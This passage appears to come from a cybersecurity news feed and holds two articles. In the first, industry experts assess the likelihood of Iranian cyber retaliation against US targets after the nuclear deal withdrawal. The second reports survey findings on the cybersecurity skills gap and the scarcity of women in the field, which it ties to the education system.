Given Iran's growth over the last five years in the cyber domain, I would expect them to at least be initially successful against civilian targets in the US should they decide to go that route. From a technical perspective they have more than enough capability to carry out successful attacks, as we have seen in the Middle East and the United States. If private sector networks are left to their own defences, Iran will have a high success rate. The thing that will reduce their operational capacity is if the US government takes a proactive and aggressive counter cyber posture and actively disrupts Iran's program before an attack is launched. While this would greatly hamper Iran's efforts it would not eliminate them completely and it would also be an escalation that could result in Iran taking more destructive measures because they have less options and control.”

Priscilla Moriuchi, Director of Strategic Threat Development, Recorded Future:

“President Trump’s actions have placed American businesses at increased risk for retaliatory and destructive cyber attacks by the Islamic Republic. We assess that within months, if not sooner, American companies in the financial, critical infrastructure, oil, and energy sectors will likely face aggressive and destructive cyber attacks by Iranian state-sponsored actors.

Further, our research indicates that because of the need for a quick response, the Islamic Republic may utilise contractors that are less politically and ideologically reliable (and trusted) and as a result, could be more difficult to control. It is possible that this dynamic could limit the ability of the government to control the scope and scale of these destructive attacks once they are unleashed.”

Phil Neray, VP of Industrial Cybersecurity, CyberX:

“Cyber is an ideal mechanism for weaker adversaries like Iran because it allows them to demonstrate strength on the global stage without resorting to armed conflict. I expect that Iran will continue to escalate its cyberattacks on US targets but will keep them below the threshold that would require a kinetic response from the US.

TRITON shows that Iran has the skills to launch damaging attacks on critical infrastructure. However, for now they confine these attacks to Middle Eastern targets in the same way that Russia has so far only shut down the power grid in the Ukraine. We should expect Iran to conduct phishing and cyber espionage attacks against US-based industrial and critical infrastructure firms -- as we've seen with Russian threat actors -- with the goal of establishing footholds in OT networks that could later be used for more destructive attacks.”

Gen. Earl Matthews, senior vice president and chief strategy officer, Verodin:

“The Iranians continue to improve and have become more sophisticated with their cyber capabilities. In my opinion, they are in the top 5 of countries with significant capabilities. We will definitely see increased cyber activity as a result of the US backing out of the nuclear agreement. Attacks not only against the US but many of our allies, especially Israel.

Iran has previously attacked our financial institutions with Denial of Service and most recently penetrated a number of universities. The latest attacks represented the continued loss of intellectual property of our nation. It wouldn’t surprise me if many of these universities were specifically targeted because they are doing research and development on behalf of the US Government.

Iran most certainly has the capability of launching significant attacks but I would view that probability to be low. They will continue to pursue softer targets where common means of access will be through social engineering and penetrate organizations with weak cyber hygiene. These attacks can be mitigated if organizations continuously automated and measured the validity, value, and effectiveness of their cybersecurity controls. We are well beyond the checklist compliance and thinking we are safe.”

John Hultquist, Director of Intelligence Analysis, FireEye:

“Iranian actors remain among the most aggressive we track, carrying out destructive and disruptive attacks in addition to stealthier acts of cyber espionage. Prior to the nuclear agreement, Iranian actors carried out several attacks against the West. There were also clear signs these actors were probing Western critical infrastructure in multiple industries for future attack. These efforts did not entirely disappear with the agreement, but they did refocus on Iran’s neighbors in the Middle East. With the dissolution of the agreement, we anticipate that Iranian cyberattacks will once again threaten Western critical infrastructure.”

Sherban Naum, senior vice president for corporate strategy and technology, Bromium:

“The premise that Iran can or will increase their attacks is predicated on both their existing computer network attack practices and risk tolerance to potential retaliation. The regime may see a need to show strength internally and take action. They will have to balance the time and resources dedicated to increase offensive efforts with the need to shore up defensive efforts due to the increased conflicts in the region from regional actors as well a potential retaliation by those that they attack.

[...]

There are three possible areas they could focus: Critical infrastructure, a doxxon like attack looking to shame those involved with the reversal decision and the third being in region actors and their weapons systems.

[...]

The questions to ask are what would motivate their taking action and their acceptable outcomes. Taking action, putting lives at risk could result in a kinetic response from the US and/or its allies as well as put into question Europe’s current support of the agreement. If they were to take out a power station and a hospital loses power, they lose the PR war and retaliation from the US is quite plausible. At this point, they want to show the world they are going to continue down the path of adhering to the nuclear agreement, that they are the ones targeted and have so much to lose. They would be better off influencing Europe to play into their hands as it could suit their economic needs and try to influence their own social media movement.”

Robert Lee, CEO, Dragos:

“ICS cyber attacks and espionage can be highly geopolitical in nature. Every time we see increased tension between states we expect to see a rise in ICS targeting, this does not mean we expect to see attacks. In this case, activity moves beyond conducting early reconnaissance to gaining access to infrastructure companies and stealing information that could be used at a later date. However simply having access to the information does not mean an attack is easy or imminent. Avoiding such tension while also defending against such aggressive efforts is the goal.”

Sanjay Beri, CEO & Founder of Netskope:

“While the repercussions of the United States pulling out of the Iran nuclear deal will be wide reaching, one of the first places you can expect to see a response is cyberspace. Nation-states, including Iran, have historically used cyberattacks as a low-risk, high-reward tactic for retaliating to political opposition. We saw this with North Korea in the form of the Sony hack, and Iran’s attack against US banks following Stuxnet.

The U.S. needs cybersecurity leadership today more than ever if we are to stand a chance at defending the country from nation-state sponsored cyber attacks. Forming a cohesive cyber defense strategy has become nearly impossible as hundreds of departments report into a siloed set of decision makers. There’s no silver bullet, but appointing a federal CISO to oversee all of our nation’s cybersecurity initiatives and promote inter-agency collaboration would be a big step in the right direction.”

Willy Leichter, Vice President of Marketing, Virsec:

“It seems likely that a deteriorating relationship between the US and Iran will lead to more cyberattacks. There have been numerous reports about state-sponsored hacking groups in Iran including APT33 that have already targeted critical infrastructure in Saudi Arabia, South Korea, and the US. These hacking groups have access to advanced tools (many leaked from the NSA through the Shadow Brokers) to launch attacks that corrupt legitimate processes and memory, and have proved adept at creating multiple variants of these exploits. We need to expect ongoing cyber warfare to be the new normal, and it’s critical that all organizations take security much more seriously, improve their detection and protection capabilities, and train all employees to protect their credentials against theft.”

Andrew Lloyd, President, Corero Network Security:

“Given multiple reports implicating the Iranian government in the cyber-attack on the Saudi petrochemical plant, the prospect of cyber-retribution for the US withdrawal certainly exists. Also, it’s well worth remembering that even if a nation doesn't have well developed cyberwarfare resources, there’s plenty of bad actors on the global stage who are more than happy to launch attacks against the foes of anyone who’s willing to pay. Moreover, the irony is that such bad actors are able to leverage the exploits that major forces such as the US government have themselves developed and which subsequently leaked across the Dark Web’s darker commercial corners. For example, it’s well reported that groups such as the Shadow Brokers have released and brokered tools from the NSA.

Also, basic and advanced DDoS-for-hire services abound, as we’ve seen in recent weeks and months. This all underscores the fact that all operators of essential services (and especially, critical national infrastructure) must up their game when it comes to DDoS defences. Ironically, today is the day that the EU NIS Directive becomes law in all 28 EU Member States.”


Is The Education System Keeping Women Out of Cybersecurity?
10.5.2018 securityweek Cyber

While the Gender Bias in Professions Remains Strong, There Are Indications That Factors Beyond Genuine Aptitude Are at Play

Despite the increasing cybersecurity skills shortage, projected by Frost & Sullivan to reach 1.8 million unfilled roles by 2020, we are yet to engage with the obvious solution. There is currently more interest in reducing vacancies using artificial intelligence (AI) and automation than in training youngsters to adopt the profession.

The problem with AI as a solution, according to a report published Tuesday by ProtectWise, is, "The impact of artificial intelligence on the man-hours required to staff a security operations center is basically nil today -- and will be for a significant amount of time."

This is confirmed by a separate survey (PDF) published Wednesday by Exabeam. Exabeam queried 481 cybersecurity professionals around the world. It found nearly 68% of respondents reported they do not currently use AI or ML in their jobs or don’t have plans to use in the future, even though 75% agreed AI/ML can make their job better or easier and improve security.

The short-term solution to the skills gap must necessarily be to increase skills rather than the long-term reduction of demand.

Together with the skills gap is an awareness of the paucity of women in security. This is also confirmed by Exabeam's study, which found that 90% of security professionals are male.

ProtectWise returned to the data it gathered in an ESG survey last year, but specifically looked for any indication that the two problems may be linked: in short, could increasing the number of young women entering the security profession reduce the skills gap?

What it found is somewhat counterintuitive. Although the well-known gender bias in professions remains strong, there are indications that factors other than genuine aptitude are at play. In high school, twice as many men as women plan to study engineering, computer science or mathematics at college. Similarly, twice as many men as women consider IT as a future career.

At the same time, women are less confident in their aptitude for a career in cybersecurity. Forty-two percent of women profess to not knowing enough about the subject, compared to 35% of men; while 34% of women (compared to 25% of men) consider they do not have the aptitude.

What is surprising, however, is that the early exposure to technology that is believed to be the springboard to first studies and then careers in IT is stronger in young women than it is in young men. As many women as men game online, and the numbers that consider themselves to be early adopters of technology are also similar.

In some cases, however, young women are actually the early adopters -- 52% of women had tried VR compared to 42% of men; and more women than men have advanced technology in their household.

One conclusion that can be drawn is that the education system is the block. Young men and women enter the system with an equal aptitude for technology in general; but fewer women than men leave it to pursue technology careers. More concerning for cybersecurity is that very few of either gender consider security as a potential career.

A primary reason is that they simply do not have the option. Sixty-nine percent of the respondents said they had never taken a cybersecurity class in school, and 65% said that their school never offered a cybersecurity course.

This lack of interest from the schools does their pupils no favors. The Exabeam study shows a median salary range of $75,000 - $100,000 per year, with 34% earning more than $100,000 per year (chief security officers can expect around $200,000 and above); while 86% of existing professionals would recommend a career as a security analyst to new graduates. Good money and job satisfaction should be strong incentives.

ProtectWise co-founder and CTO Gene Stevens believes the problem is a latency between society's needs and society's understanding of those needs. “Our society has not yet embraced cybersecurity as a civilization-defining competency, yet it is exactly central to our capacity to function in this massively technological age," he told SecurityWeek. "In foundational terms, it's an education and awareness problem."

The solution is a sustained effort to get cybersecurity into the educational syllabus. "In education," he continued, "one of the best roads is to have cybersecurity technology standards baked into state standards of expectation for all students. State boards review these on a regular basis, usually every three to five years. We should reach out to departments of education state by state to engage on this topic. As digital citizenship is currently being developed locally, we need to reach out to school counselors and partner with teachers -- reaching out to education associations to offer resource and support is easy and could be highly beneficial."

While educational restraints may be playing a part in a lacking cybersecurity workforce, Ashley Arbuckle, Cisco’s VP of Security Services, believes that inclusion will help put a stop the perpetual scrambling for cybersecurity workers.

“No matter how you measure it, the number of unfilled cybersecurity positions is big and it’s a problem we’ve been lamenting for years,” Arbuckle wrote in a recent SecurityWeek column. “The traditional approach to address the shortage has been to encourage more individuals to pursue technical and engineering degrees. But which individuals? And if you aren’t “technical” does that mean there’s no room for you in cybersecurity? If we think more broadly about the type of talent we need and how to build even better security teams, we’ll see that the solution to the workforce gap is through inclusion.”

Arbuckle also believes there is no one definition of a cybersecurity professional and no one path to get there. “By increasing awareness of the varied skills needed and providing support to cultivate such talent, we have an opportunity to expand the pool of workers and improve security and financial performance in the process, with teams that are based on inclusion and diversity. We need to marshal all our resources to strengthen our defenses,” Arbuckle said.